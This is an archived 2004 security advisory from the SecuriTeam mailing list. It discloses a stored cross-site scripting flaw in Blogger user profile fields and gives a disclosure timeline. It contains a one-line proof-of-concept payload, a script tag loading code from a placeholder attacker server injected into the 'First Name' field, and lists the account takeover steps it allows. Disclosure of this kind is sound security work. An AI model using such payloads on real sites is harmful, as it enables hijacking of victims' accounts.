[UNIX] Blogger Cross Site Scripting Vulnerability
From: SecuriTeam (support_at_securiteam.com)
Date: 03/30/04
- Previous message: SecuriTeam: "[TOOL] FLAG - Forensic and Log Analysis GUI"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 30 Mar 2004 12:59:55 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Blogger Cross Site Scripting Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://www.blogger.com> Blogger is a web-based tool that helps you
publish to the web instantly -- whenever the urge strikes. Blogger is the
leading tool in the rapidly growing area of web publishing known as
weblogs, or "blogs."
There is a cross site scripting vulnerability in Blogger due to incorrect
HTML input validation.
DETAILS
There is no HTML filter when rendering user profiles. Allowing anyone to
inject a script into a profile's "First Name" "Last Name" etc. If code is
injected into the First Name field for example it will be visible in the
user's first page.
Proof of concept example
Inject [script src="http://[ATTACKER-SERVER]/EVIL-JS/"][/script] to victim
"First Name" and now it's possible to execute script code.
After login as the victim some possibilities are available:
* Change the password without needing the old one
* Change the Email address without confirmation
* Own the victim's blogs.
Disclosure Timeline
Discovered on 2/22/2004
Vendor Informed on 2/25/2004
Published on 3/26/2004
ADDITIONAL INFORMATION
The information has been provided by <mailto:ferruh@mavituna.com> Ferruh
Mavituna.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[TOOL] FLAG - Forensic and Log Analysis GUI"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
